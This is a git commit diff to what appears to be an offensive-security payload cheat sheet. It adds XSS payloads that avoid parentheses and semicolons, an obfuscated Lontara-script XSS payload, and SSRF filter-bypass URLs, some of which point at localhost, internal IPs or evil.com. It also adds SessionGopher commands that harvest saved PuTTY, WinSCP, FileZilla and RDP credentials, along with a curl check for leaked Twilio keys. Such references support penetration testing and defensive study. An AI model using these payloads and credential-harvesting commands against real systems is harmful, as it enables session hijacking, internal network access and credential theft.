XSS without parenthesis, semi-colon + Lontara

This commit is contained in:
Swissky 2019-05-15 21:55:17 +02:00
parent cc8c7b3e70
commit 9c2e63818f
5 changed files with 92 additions and 16 deletions

View File

@ -15,6 +15,7 @@
- [BAZAAR - Source code management](#bazaar---source-code-management) - [BAZAAR - Source code management](#bazaar---source-code-management)
- [Automatic way : rip-bzr](#automatic-way--rip-bzr) - [Automatic way : rip-bzr](#automatic-way--rip-bzr)
- [Automatic way : bzr_dumper](#automatic-way--bzr_dumper) - [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
- [Leaked API keys](#leaked-api-keys)
## GIT - Source code management ## GIT - Source code management
@ -236,6 +237,16 @@ $ bzr revert
N static/ N static/
``` ```
## Leaked API keys
If you find any key , use the [keyhacks](https://github.com/streaak/keyhacks) from @streaak to verifiy them.
Twilio example :
```powershell
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts/ACCOUNT_SID/Keys.json' -u ACCOUNT_SID:AUTH_TOKEN
```
## References ## References
- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks) - [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)

View File

@ -686,3 +686,4 @@ net group "Domain Admins" hacker2 /add /domain
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)

View File

@ -320,6 +320,19 @@ Oneliner method to extract wifi passwords from all the access point.
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
``` ```
### Passwords stored in services
Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)
```powershell
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
```
## EoP - Processes Enumeration and Tasks ## EoP - Processes Enumeration and Tasks
What processes are running? What processes are running?

View File

@ -7,6 +7,19 @@
* [Tools](#tools) * [Tools](#tools)
* [Payloads with localhost](#payloads-with-localhost) * [Payloads with localhost](#payloads-with-localhost)
* [Bypassing filters](#bypassing-filters) * [Bypassing filters](#bypassing-filters)
* [Bypass using HTTPS](#bypass-using-https)
* [Bypass localhost with [::]](#bypass-localhost-with----)
* [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)
* [Bypass localhost with CIDR](#bypass-localhost-with-cidr)
* [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding)
* [Bypass using malformed urls](#bypass-using-malformed-urls)
* [Bypass using rare address](#bypass-using-rare-address)
* [Bypass using bash variables](#bypass-using-bash-variables)
* [Bypass using tricks combination](#bypass-using-tricks-combination)
* [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
* [Bypass filter_var() php function](#bypass-filter-var-php-function)
* [Bypass against a weak parser](#bypass-against-a-weak-parser)
* [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme) * [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)
* [file://](#file) * [file://](#file)
* [http://](#http) * [http://](#http)
@ -15,7 +28,7 @@
* [tftp://](#tftp) * [tftp://](#tftp)
* [ldap://](#ldap) * [ldap://](#ldap)
* [gopher://](#gopher) * [gopher://](#gopher)
* [SSRF to XSS](#ssrf-to-xss-by-d0rkerdevil--alyssaoherrera) * [SSRF to XSS](#ssrf-to-xss)
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
* [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk) * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
@ -75,14 +88,14 @@ Using this vulnerability users can upload images from any image URL = trigger an
## Bypassing filters ## Bypassing filters
Bypass using HTTPS ### Bypass using HTTPS
```powershell ```powershell
https://127.0.0.1/ https://127.0.0.1/
https://localhost/ https://localhost/
``` ```
Bypass localhost with [::] ### Bypass localhost with [::]
```powershell ```powershell
http://[::]:80/ http://[::]:80/
@ -98,7 +111,7 @@ http://0000::1:22/ SSH
http://0000::1:3128/ Squid http://0000::1:3128/ Squid
``` ```
Bypass localhost with a domain redirecting to locahost ### Bypass localhost with a domain redirection
```powershell ```powershell
http://localtest.me http://localtest.me
@ -113,16 +126,17 @@ The service nip.io is awesome for that, it will convert any ip address as a dns.
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1 NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
``` ```
Bypass localhost with CIDR : 127.x.x.x ### Bypass localhost with CIDR
It's a /8
```powershell ```powershell
it's a /8
http://127.127.127.127 http://127.127.127.127
http://127.0.1.3 http://127.0.1.3
http://127.0.0.0 http://127.0.0.0
``` ```
Bypass using a decimal ip location ### Bypass using a decimal IP location
```powershell ```powershell
http://0177.0.0.1/ http://0177.0.0.1/
@ -131,20 +145,24 @@ http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1 http://3232235777/ = http://192.168.1.1
``` ```
Bypass using [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm) ### Bypass using IPv6/IPv4 Address Embedding
[IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
```powershell ```powershell
http://[0:0:0:0:0:ffff:127.0.0.1] http://[0:0:0:0:0:ffff:127.0.0.1]
``` ```
Bypass using malformed urls ### Bypass using malformed urls
```powershell ```powershell
localhost:+11211aaa localhost:+11211aaa
localhost:00011211aaaa localhost:00011211aaaa
``` ```
Bypass using rare address, you can short-hand IP addresses by dropping the zeros ### Bypass using rare address
You can short-hand IP addresses by dropping the zeros
```powershell ```powershell
http://0/ http://0/
@ -152,14 +170,16 @@ http://127.1
http://127.0.1 http://127.0.1
``` ```
Bypass using bash variables (curl only) ### Bypass using bash variables
(curl only)
```powershell ```powershell
curl -v "http://evil$google.com" curl -v "http://evil$google.com"
$google = "" $google = ""
``` ```
Bypass using tricks combination ### Bypass using tricks combination
```powershell ```powershell
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
@ -168,7 +188,9 @@ requests + browsers : 2.2.2.2
urllib : 3.3.3.3 urllib : 3.3.3.3
``` ```
Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow) ### Bypass using enclosed alphanumerics
[@EdOverflow](https://twitter.com/EdOverflow)
```powershell ```powershell
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
@ -177,13 +199,15 @@ List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
``` ```
Bypass filter_var() php function ### Bypass filter_var() php function
```powershell ```powershell
0://evil.com:80;http://google.com:80/ 0://evil.com:80;http://google.com:80/
``` ```
Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf)) ### Bypass against a weak parser
by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
```powershell ```powershell
http://127.1.1.1:80\@127.2.2.2:80/ http://127.1.1.1:80\@127.2.2.2:80/
@ -317,7 +341,9 @@ Content of evil.com/redirect.php:
?> ?>
``` ```
## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) ## SSRF to XSS
by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
```bash ```bash
http://brutelogic.com.br/poc.svg -> simple alert http://brutelogic.com.br/poc.svg -> simple alert

View File

@ -28,6 +28,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event) - [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
- [Bypass dot filter](#bypass-dot-filter) - [Bypass dot filter](#bypass-dot-filter)
- [Bypass parenthesis for string](#bypass-parenthesis-for-string) - [Bypass parenthesis for string](#bypass-parenthesis-for-string)
- [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon)
- [Bypass onxxxx= blacklist](#bypass-onxxxx---blacklist) - [Bypass onxxxx= blacklist](#bypass-onxxxx---blacklist)
- [Bypass space filter](#bypass-space-filter) - [Bypass space filter](#bypass-space-filter)
- [Bypass email filter](#bypass-email-filter) - [Bypass email filter](#bypass-email-filter)
@ -39,6 +40,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Bypass ";" using another character](#bypass-using------using-another-character) - [Bypass ";" using another character](#bypass-using------using-another-character)
- [Bypass using HTML encoding](#bypass-using-html-encoding) - [Bypass using HTML encoding](#bypass-using-html-encoding)
- [Bypass using Katana](#bypass-using-katana) - [Bypass using Katana](#bypass-using-katana)
- [Bypass using Lontara](#bypass-using-lontara)
- [Bypass using ECMAScript6](#bypass-using-ecmascript6) - [Bypass using ECMAScript6](#bypass-using-ecmascript6)
- [Bypass using Octal encoding](#bypass-using-octal-encoding) - [Bypass using Octal encoding](#bypass-using-octal-encoding)
- [Bypass using Unicode](#bypass-using-unicode) - [Bypass using Unicode](#bypass-using-unicode)
@ -525,6 +527,21 @@ alert`1`
setTimeout`alert\u0028document.domain\u0029`; setTimeout`alert\u0028document.domain\u0029`;
``` ```
### Bypass parenthesis and semi colon
```javascript
// From @garethheyes
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>
// From @terjanq
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
// From @cgvwzq
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
```
### Bypass onxxxx= blacklist ### Bypass onxxxx= blacklist
```javascript ```javascript
@ -704,6 +721,14 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library.
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
``` ```
### Bypass using Lontara
```javscript
ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()
```
More alphabets on http://aem1k.com/aurebesh.js/#
### Bypass using ECMAScript6 ### Bypass using ECMAScript6
```html ```html